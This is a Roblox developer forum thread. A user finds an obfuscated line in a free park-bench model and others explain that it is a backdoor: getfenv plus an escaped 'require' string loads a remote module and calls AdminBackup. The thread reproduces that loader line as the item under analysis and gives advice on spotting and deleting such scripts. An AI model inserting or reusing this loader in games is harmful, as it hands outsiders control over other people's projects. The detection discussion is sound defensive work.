Can anybody tell me what this means?

I’ve inserted a free model into my game which has this dodgy-looking code in it.

getfenv()["\114\101\113\117\105\114\101"](string.reverse(8116446286)):AdminBackup()

Can anybody translate this/tell me what is means?

Also, if you find a post similar to this, please feel free to message me about that! Sorry if it’s under the wrong category too.

2 Likes

Well, I posted and it’s awaiting approval, but I got the model of it and its getting the functions in the model (or just inserting). it is obviously a backdoor. So, it reverses the number of the model and gets this: [ Content Deleted ] - Roblox I checked it out, and I have no idea how to understand it, it’s like REALLY obfuscated code I doubt anyone could understand especially because it has a whole different language in it.

2 Likes

Thanks for the reply! I couldn’t really understand what you said, though. Would you mind simplifying?

I’m not exactly sure what the ["\114\101\113\117\105\114\101"] means, but it is getting a function of the model and calling it. the string.reverse() reverses the number and gets the model. I’m not sure specifically how it works, you would need someone more understanding in this area to explain better.

2 Likes

If you want just the free model alone just delete the code anyway, it wont help anything sitting there regardless if it’s malicious or not.

If the model is supposed to have a ‘scripted’ effect to it, try deleting that line, playtest the game and see if it still works as intended.

1 Like

Not sure but I know getfenv() is commonly used by backdoors.

1 Like

All I now is getfenv is commonly used to exploit your game.

1 Like

getfenv is used to avoid writing “require”, because people usually search for “require” to avoid backdoors. The string “\114\101\113\117\105\114\101” is the ASCII representation of “require”. You can check it here ASCII to text converter - Converters . That’s why if you’re looking for backdoors in your script, make sure you search for “require” and “getfenv”.

EDIT: Do not search for “getenv”, it’s not a valid function in roblox LUA. (thanks to @deluc_t for the correction)

6 Likes

Yeah, it was a park bench. It didn’t have any certain effect to it, so it’s probably malicious.

Also, it said this, which was sort of weird -

--Auto welding script (anchors so the tree doesnt fall apart)

but the model was a bench, not a tree.

I deleted the whole script, and everything is good. Thank you!

Yeah thats a big warning sign, scripts in models that don’t need scripts (like benches lol).

1 Like

Thanks for linking the converter! I deleted the whole script, so now I’m not getting any strange messages in my Output. :grinning:

1 Like

Great! Always be wary of free models!

2 Likes

“getenv” is not a valid function, so no point in searching for that.